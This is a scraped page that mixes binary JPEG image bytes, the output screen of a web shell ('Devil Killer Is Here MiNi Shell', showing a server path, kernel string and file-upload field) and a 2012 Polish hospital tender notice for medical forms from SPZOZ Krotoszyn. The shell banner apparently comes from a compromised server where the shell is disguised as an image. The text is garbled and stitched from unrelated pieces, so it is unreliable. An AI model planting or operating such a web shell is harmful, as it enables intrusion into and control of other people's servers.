JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121228/530314-N-2012.html

<p class="kh_header"><b>Krotoszyn: DOSTAWA DRUKÓW I KSIĄŻEK MEDYCZNYCH DLA SPZOZ KROTOSZYN.</b><br>
<b>Numer ogłoszenia: 530314 - 2012; data zamieszczenia: 28.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Młyńska 2, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 5880390 w. 253, faks 062 5880402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.krotoszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA DRUKÓW I KSIĄŻEK MEDYCZNYCH DLA SPZOZ KROTOSZYN..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWA DRUKÓW I KSIĄŻEK MEDYCZNYCH - PAKIET 1 - 2..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>DOSTAWA DRUKÓW I KSIĄŻEK MEDYCZNYCH, MAKSYMALNIE 20% WARTOŚCI ZAMÓWIENIA PODSTAWOWEGO.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0, 22.11.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta winna zawierać wszystkie dokumenty i oświadczenia wymienione w rozdziale VI niniejszej SIWZ oraz : 
a.	Formularz ofertowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 1.
b.	Formularz cenowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 2. Do oferty należy dołączyć wypełnione Formularze cenowe również w formie elektronicznej (plik.xls) z niezablokowanymi formułami. Formularze cenowe w formie pliku.xls umieszczone są i dostępne do ściągnięcia na stronie internetowej Zamawiającego www.bip.spzoz.krotoszyn.pl .
 
W przypadku podpisania oferty oraz poświadczenia za zgodność z oryginałem kopii dokumentów przez osobę niewymienioną w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo (oryginał lub kopia poświadczona na zgodność z oryginałem przez notariusza).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>§6 Projektu umowy:
2.	Strony ustalają możliwość zmiany cen wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej umowy. Za okoliczność taką uważa się :
	-	ustawową zmianę stawek podatku VAT.
3.	W przypadku ustawowej zmiany stawki podatku VAT na przedmiot niniejszego zamówienia, jej zmiana 	następuje z mocy prawa.  
§13 Projektu umowy:
2.	Strony dopuszczają zmiany umowy w zakresie: 
-	nazwy  i treści druku, 
-	liczby kart w druku lub książce.
-      przedłużenia terminu realizacji umowy do czasu wykorzystania przedmiotu umowy, do wartości nie     
        większej niż całkowita wartość umowy.

Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej i nie mogą być niekorzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.spzoz.krotoszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SPZOZ KROTOSZYN, UL. MŁYŃSKA 2, 63-700 KROTOSZYN, POKÓJ NR 20..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.01.2013 godzina 09:00, miejsce: SEKRETARIAT SPZOZ KROTOSZYN, UL. MŁYŃSKA 2, 63-700 KROTOSZYN, POKÓJ NR 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Druki medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	F 0038 CPMiPZ	Ankieta dla kobiet objętych populacyjnym programem wczesnego wykrywania raka piersi bloczki nie klejone	50	A4 jednostr. kartki
2.	F 0154	Ankieta udarowa	5	A4 jednostr.
3.	PL-02	Badanie przedmiotowe / badanie podmiotowe ogólne   bloczki nie klejone	165	A3 dwustr. kartki
4.	S-14-LC	Badanie w kierunku wirusowego zapalenia wątroby / dwustronny	60	A6 dwustr.
5.	Dz.Fin-Księgowy 018	Bankowy dowód wplaty - PODATEK./A6 dwa kolory /samokopia	5	A6 kopia dwa kolory bl.
6.	Dz.Fin-Księgowy 017	Bankowy dowód wplaty WP./A6 dwa kolory /samokopia	40	A6 kopia dwa kolory bl.
7.	Pr.31-Z01B	Bilet odbioru wyników - Bakter.	5	A7 jednostr.
8.	Pr.31-Z01A	Bilet odbioru wyników - lab. Centr.	100	A7 jednostr.
9.	F 0114 AOS	Dieta pacjenta-POR.DIABET.	10	A4 JEDNOSTR.
10.	F 0140	druk- po odbiór wyniku mammografii	20	A6 jednostr.
11.	F 0027b	druk potwierdzający dostarczenie należytych ilości posilków do kuchenek oddzialowych	5	A4 dwustr.
12.	F 0041	Elektrokardiogram	120	A4 dwustronne
13.	F 0044 Z-01,02,03,04,05	Formularz zgłoszenia zachorowania(podejrzenia zachorowania) na chorobę zakaźną , ZAŁACZNIKI 2,3,4,5 bloczki nie klejone	4	A4 jednostr.4 KARTKI
14.	PL-03	Ginekologiczne badanie przedmiotowe	30	A4 jednostr.
15.	PL-01	Historia choroby (szpital)	165	A3 dwustr.
16.	PL-21	Historia choroby SOR 	215	A3 dwustr. 
17.	PP-01	Historia opieki pielęgniarskiej	140	A3 dwustr.
18.	PL-45	Historia rehabilitacji (str. 1-4)	10	A3 dwustr.
19.	PL-45	Historia rehabilitacji (str. 5-8) - badanie neurologiczne	10	A3 dwustr.
20.	PL-29	Historia zdrowia i choroby AMBULATORIUM	180	1/2 A3 DWUSTR. 
21.	PL-29 A	Historia zdrowia i choroby AMBULATORIUM	100	A5 jednostr.
22.	PL-30	Historia zdrowia i choroby AMBULATORIUM - wkładka	150	A5 dwustr.
23.	F 0122 ZLU	Indywidualna karta zabiegów rehabilitacyjnych	50	A4 dwustr.
24.	F 0123 ZLU	Indywidualna karta zabiegów rehabilitacyjnych dla dzieci	30	A4 dwustr.
25.	PL-05	Indywidualna karta zleceń diagnostycznych  oddziału wewnętrznego	180	A4 dwustr.
26.	PL-04	Indywidualna karta zleceń lekarskich	325	A4 dwustr.
27.	PL-04A	Indywidualna karta zleceń lekarskiech / rehabilitacja	30	A3 dwustr.
28.	F 0118 AOS	Informacja dla lekarza kierującego / samokopia	155	A5 samokopia
29.	F 0131 POŁ-GIN	Informacja dla pacjentki oraz formularz świadomej zgody na operacyjne rozwiązanie ciąży metodą cięcia cesarskiego	4	A3 dwustr.
30.	Instr.32 Z-01	Karta badania histopatologicznego	38	A5 dwustr.
31.	F 0091 CPMiPZ	Karta badania mammograficznego- Program prof.raka piersi	30	A4 jednostr.
32.	PL-10	Karta badań laboratoryjnych. ODDZ. IOM	20	A4 dwustr.
33.	F 0099	Karta bilansu płynów	57	A4 dwustr.
34.	F 0048	Karta chorób narządu rodnego- karta ginekologiczna	8	A4 jednostr.
35.	F 0049	Karta ciąży  bloczki nie klejone	4	A3 dwustr. Kartki
36.	F 0115 AOS	Karta dawkowania leków-POR.DIABET.	20	A5 dwustr.
37.	Pr 25. Z-01	Karta depozytowa - przedmiotów wartościowych / samokopiujący, format A5	5	A5 samokopia
38.	AD 079	Karta drogowa	50	A5 dwustronna, NUMEROWANA
39.	AD 003	Karta ewidencji czasu pracy pracownika/ karton	6	A4 / sztywna
40.	PL-08	Karta gorączkowa niemowlęcia	20	A4 dwustr.
41.	PL-07	Karta gorączkowa ogólna	170	A4 dwustr.
42.	PL-09	Karta gorączkowa położnicza- ODDZ.GIN-POŁ	30	A4 dwustr.
43.	F 0052 PSPR	Karta informacyjna nr (pogotowie)	35	A6 jednostronna
44.	Pr 20. Z-01	Karta informacyjna z leczenia szpitalnego - Bloczki nie klejone	400	A4 jednostr. KARTKI
45.	Pr. 20 Z-02	Karta informacyjna z leczenia szpitalnego dla SOR / samokopia	400	A4 jednostr. Samokopia
46.	F 0055	Karta konsultacji	110	A4 dwustr.
47.	F 0056	Karta kontroli zgłoszeń - por. G-P.	6	A6 dwustr.
48.	F 0057 DZIEC.	Karta laboratoryjna badania moczu/ oddz. dziec.	10	A4 dwustr.
49.	PL-39 A	karta medycznych czynności ratunkowych zał. nr 4 (SAMOKOPIUJĄCY)	120	A4 samokopia
50.	PL-31	Karta noworodka	11	A4 dwustr.
51.	PL-11A	Karta obserwacji - SOR	120	A4 dwustr.
52.	PL-11	Karta obserwacji lekarskich	310	A4 dwustr.
53.	PL-12	Karta obserwacji porodu (ODDZ.GIN-POŁ zał. nr 2)	10	A3 jednostr.
54.	PL-23	Karta obserwacji skóry noworodka 1-4 doby	8	A4 dwustr.
55.	Pr 11 ZKZS-Z.03	Karta obserwacji wkłuć obwodowych	167	A4 dwustr.
56.	F 0101	Karta obserwacji wybranych parametrów	12	A4 dwustr.
57.	PL-13	Karta obserwacyjna IOM	10	A3 dwustr.
58.	Pr 11 ZKZS-Z.01	karta obsrewacji centralnego dostępu żylnego 	28	A4 dwustr.
59.	PL-43	Karta oceny przebiegu programu rehabilitacji	10	A4 jednostr.
60.	ZOL/ZOP	Karta oceny swiadczeniobiorcy kierowanego do zakładu opiekuńczego/ przebywająceo w zakładzie opiekuńczym A4	15	A4 dwustr.
61.	PP-07	Karta opieki pielęgniarskiej - ODDZ. WEW.	100	A3 dwustr. 
62.	PP-08	Karta opieki pielęgniarskiej  ODDZ.DZIECIĘCY	20	A4 dwustr.
63.	PP-09	Karta opieki pielęgniarskiej - ODDZ.NOWORODKOWY	10	A4 dwustr.
64.	PP-19	Karta opieki pielęgniarskiej o/rehabilitacyjnego	30	A4 dwustr.
65.	PP-04	Karta opieki pielęgniarskiej -ODDZ. CHIR.	35	A3 dwustr. 
66.	PP-11	Karta opieki pielęgniarskiej- ODDZ.POŁ-GIN	25	A4 dwustr.
67.	PP-05	Karta opieki pielęgniarskiej.ODDZ. IOM	10	A4 dwustr.
68.	PP-20	Karta pielęgnacji pacjenta SOR	120	A4 dwustr.
69.	Pr 57. Z-01	karta pielęgnacji pacjenta z odleżynami	44	A4 dwustr.
70.	PL-14	Karta położnicza	30	A3 dwustr.
71.	F 0144 O/REH	Karta pracy psychologicznej z pacjentem	10	A4 jednostr.
72.	Pr 55. Z-01(wyd2)	Karta praw i obowiązków pacjenta	156	A4 dwustr.
73.	Pr.33 Z-01	Karta skierowania zwlok do chlodni	15	A4 samokopia
74.	F 0143 O/REH	Karta terapii logopedycznej	10	A4 jednostr.
75.	F 0003 NOWOR.	Karta uodpornienia/ Oddz. Nowor. / karton	10	A4 dwustronna sztywna
76.	PL-49 ZOL/ZOP	Karta usprawniania pacjenta / A3 dwustronny	13	A3 dwustr.
77.	F 0023	Karta wyników badań laboratoryjnych-POR.DIABET.	30	A4 jednostronne
78.	F 0024	Karta wyników dodatkowych badań laboratoryjnych	30	A4 jednostronne
79.	F 0120 ZLU	Karta zabiegów /ZLU	90	A4 dwustr.
80.	F 0062	Karta zgłoszenia nowotworu złośliwego	7	A4 jednostr.
81.	MZ/2001	Karta zgonu (karta statystyczna do karty zgonu)	11	A4 dwustr.
82.	PL-50	Karta zleceń  - SOR	130	A4 dwustr.
83.	PL-17	Karta zleceń dla oddziału IOM	50	A4 dwustr.
84.	PL-44	Karta zleceń zabiegów fizjoterapeutycznych - R.N.	10	A3 dwustr.
85.	PL-18	Karta znieczulenia SP ZOZ Krotoszyn / samokopia	35	A4 samokopia
86.	F 0096 POŁ-GIN	Kontrola czynności serca płodu i ciś.tętniczego krwi ciężarnej- ODDZ.GIN-POŁ	30	A4 dwustr. 
87.	F 0151	kontrola poziomu cukru we krwi - A4 dwustronna	20	A4 dwustr.
88.	AD 005	LISTA OBECNOŚCI W PRACY	15	A4 dwustronne
89.	Instr.2 Dz.G.B	Magazyn przyjmie  samokopia	10	A5 samokopia
90.	Instr.2 Dz.G.A	Magazyn wyda samokopia	50	A5 samokopia
91.	F 01 ZPDO	Miesięczne zestawienie badań wykonanych w ZPDO - A4 dwustronne	50	A4 dwustr.
92.	PP-12	Obserwacje pielęgniarskie	300	A4 dwustr.
93.	Pr 58.Z-01	Ocena chorego z podejrzeniem udaru mózgu	30	A4 dwustr.
94.	F 0127 ZLU	Ocena rozwoju ruchowego dziecka poniżej 1 roku życia	30	A4 dwustr.
95.	F 0146	Ocena ryzyka związanego ze stanem odżywienia (nutritional risk score, nrs)	150	A4 jednostr.
96.	F 0067	Ogólnopolski rejestr ostrych zespołów wieńcowych	17	A4 jednostr.
97.	F 0148	Okolooperacyjna karta kontrolna	20	A4 jednostr.
98.	F 0071	Pisemne zgłoszenie urodzenia dziecka- ODDZ.GIN-POŁ	17	A4 dwustr.
99.	PP-17	Plan pielęgnowania i karta czynności pielęgnacyjnych ZOL/ZOP zał nr 3 (str. 5-8) - bloczki nie klejone	5	A3 dwustr. kartki
100.	PP-17	Plan pielęgnowania i karta czynności pielęgnacyjnych ZOL/ZOP zał nr 3 (str.1-4) - bloczki nie klejone	5	A3 dwustr. kartki
101.	AD 004	Plan urlopów wypoczynkowych	5	1/2 A4 (w poziomie)dwustr.
102.	Dz.Fin-Księgowy 027	Polecenie księgowania PK / A4  samokopia	5	A4 samokopia
103.	Dz.Fin-Księgowy 009	Polecenie księgowania PK / A5  samokopia	30	A5 samokopia
104.	AD 006	Polecenie wyjazdu służbowego	5	A5 dwustr.
105.	PL-44A	Program rehabilitacji	10	A4 dwustr.
106.	Pr 48. Z-03	Protokół pielęgniarki operacyjnej- SALA PORODOWA, BLOK OPER.	20	A4 jednostr.
107.	Zarz.Dyr.17/03	Protokół przekazania pacjenta	165	A5 jednostr.
108.	PL-40	Przedoperacyjna ankieta anestezjologiczna	40	A4 dwustr.
109.	AD 001	Roczna karta ewidencji obecności w pracy / karton	6	A4, SZTYWNA, dwustr.
110.	AD 076	Rozkład pracy dla pielęgniarek, salowych	20	A4 jedno
111.	PL-46	Skala Asia-Standardowa klasyfikacja neurologiczna uszkodzeń rdzenia kręgowego	5	A4 dwustr.
112.	F 0109 AOS	Skala Tiss - 28 interwencja terapeutyczna	20	A4 DWUSTR.
113.	PL46A	Skale oceny pacjenta - o.reh	10	A4 dwustr.
114.	S-07	Skierowanie do poradni specjalistycznej 	281	A5 jednostr.
115.	S-20-ZPDO	Skierowanie do pracowni diagnostycznej /rtg, usg, endosk./	123	A5 jednostr.
116.	S-22-ZPDO	Skierowanie do pracowni rezonansu magnetycznego /tomografii komputerowej	63	A4 dwustr.
117.	S-01	Skierowanie do szpitala /informacja dla lekarza kierującego	135	A4 jednostr.
118.	S-02	Skierowanie do szpitala psychiatrycznego	9	A4 jednostr.
119.	Pr 37. Z-02	Skierowanie na badania kwalifikujące do podania immunoglobuliny anty D	3	A5 jednostr.
120.	Pr 37. Z-03	Skierowanie na badanie grupy krwi	49	A6 jednostr.
121.	Pr 37. Z-05	Skierowanie na krew do pilnej transfuzji	4	A6 jednostr.
122.	S-03	Skierowanie na leczenie uzdrowiskowe	6	A4 dwustr.
123.	Pr 37. Z-04	Skierowanie na wykonanie próby zgodności 	53	A6 jednostr.
124.	S-18-ZLU	Skierowanie na zabiegi fizjoterapeutyczne	85	A5 jednostr.
125.	Pr 25. Z-02	Spis rzeczy (garderoby) pacjenta (kwit depozytowt)   /samokopiujący 	4	A5 samokopia
126.	F 0098 ZPDO (Instr.6 Z-01)	świadoma zgoda pacjenta na wykonanie badania tomografii komputerowej	55	A4 dwustr.
127.	F 0014A	Upoważnienie - do odbioru dokumentacji	270	A4 jednostr.
128.	F 0112 AOS	Waga pacjenta- POR.DIABET.	20	A5 dwustr.
129.	F 0113 AOS	Wkładka do historii choroby (diabetologia) od 01.01.07	30	A4 dwustr.
130.	AD 014	Wniosek o udzielenie opieki nad dzieckiem do lat 14	5	A5 jednostr.
131.	AD 071	Wniosek o udzielenie pożyczki PKZP	15	A5 jednostr.
132.	AD 009	wniosek o udzielenie urlopu	50	A5 jednostr.
133.	W-25-LC	Wynik badania - krew obwodowa	5	A6 jednostr.
134.	W-02-LC	Wynik badania cytologicznego szyjki macicy	20	A5 jednostr.
135.	W-21-LC	Wynik badania kału na krew utajoną	5	A6 jednostr.
136.	W-13-LC	Wynik badania kału na obecność pasożytów	10	A6 jednostr.
137.	W-12-LC	Wynik badania kału na resztki pokarmowe	5	A6 jednostr.
138.	W-03-LC	Wynik badania laboratoryjnego / pusty	40	A6jednostr.
139.	W-11-LC	Wynik badania laboratoryjnego- IgE CAŁKOWITE	5	A6 jednostr.
140.	W-05-LC	Wynik badania laboratoryjnego- seromukoid	5	A6 jednostr.
141.	W-24-LC	Wynik badania- mocz	400	A5 jednostr.
142.	F 0145	Wynik badania psychologicznego - bloczki nie klejone	30	A4 dwustr. Kartki
143.	W-23-LC	Wynik badania-glukoza we krwi	400	A5 jednostr.
144.	W-22-LC	Wynik badanie kału na obecność cyst Lamblii Intestinalis	5	A6 jednostr.
145.	W-19-LC	Wyniki badania poziomu hormonów płciowych 	6	A6 jednostr.
146.	F 0097 POŁ-GIN	Wyniki badań laboratoryjnych-ODDZ.GIN-POŁ	35	A4 dwustr. 
147.	F 0021	Wyniki laboratoryjne- Oddz. Nowor.	15	A4 jednostronne
148.	W-20-LC	Wywiad do grupy krwi i przeciwciał	30	A6 jednostr.
149.	F 0152	Wywiad epidemiologiczny	220	A4 jednostr.
150.	PP-02	Wywiad pielęgniarski - bloczki nie klejone	139	A3 dwustr. kartki
151.	Pr 37. Z-01	Zamówienie na krew i jej składniki	53	A5 jednostr.
152.	F 0025	Zapotrzebowanie na leki nr samokopia	40	A4 bl samokopia
153.	F 0025a	Zapotrzebowanie na leki nr samokopia	18	A5 bl samokopia
154.	F 0153	zaswiadczenie o przeprowadzonym lekarskim badaniu kwalifikacyjnym (szczep. - nowor.)	10	A4 jednostr.
155.	F 0028	Zaświadczenie lekarskie 	130	A5 jednostr.
156.	F 0149	zaświadczenie nr (o pobycie w szpitalu)	15	A5 jednostr.
157.	F 0150	zaświadczenie o przeprowadzonym lekarskim badaniu kwalifikacyjnym (AT)	50	A5 jednostr.
158.	PP-13	Zbiorcza uproszczona ocena stanu chorego i efektywności opieki 	5	A4 dwustr.
159.	Rozp. MZ z 2005r.	Zgłoszenie urodzenia noworodka	22	A4 dwustr.
160.	Zarz.Dyr.26/02	Zgoda pacjenta na zabieg operacyjny / badanie diagnostyczne	160	A4 jednostr.
161.	F 0079	Zlecenie na transport SOR	100	A5 jednostr
